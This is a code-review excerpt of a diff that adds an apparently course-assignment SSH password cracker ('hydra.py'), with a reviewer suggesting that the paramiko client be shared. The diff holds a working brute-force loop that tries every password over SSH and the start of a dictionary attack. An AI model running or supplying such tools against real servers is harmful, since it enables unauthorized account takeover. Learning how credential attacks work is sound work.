module-4/hydra/hydra.py

```diff
@@ -1 +1,82 @@
-print("Initializing Hydra")
\ No newline at end of file
+import argparse
+import paramiko
+import itertools
+import string
+import time
+import signal
+import sys
+
+def signal_handler(sig, frame):
+    print('\n[!] Signal received. Exiting gracefully.')
+    sys.exit(0)
+
+signal.signal(signal.SIGINT, signal_handler)  # Handle Ctrl+C (SIGINT)
+
+def brute_force_ssh(username, server, charset, min_length, max_length):
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+    for length in range(min_length, max_length + 1):
+        for password in itertools.product(charset, repeat=length):
+            password = ''.join(password)
+            print(password)
+            try:
+                time.sleep(3)
+                client.connect(server, username=username, password=password, timeout=6000)
+                print(f"Password found: {password}")
+                client.close()
+                return password
+            except paramiko.AuthenticationException:
+                client.close()
+                continue
+            except Exception as e:
+                print(f"Error: {e}")
+                return None
+
+    print("Password not found.")
+    return None
+
+def dictionary_attack(username, server, wordlist):
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
```

Comment:
since you use the same initialization for both attacks, you could also define the client outside of your function scopes (in global scope)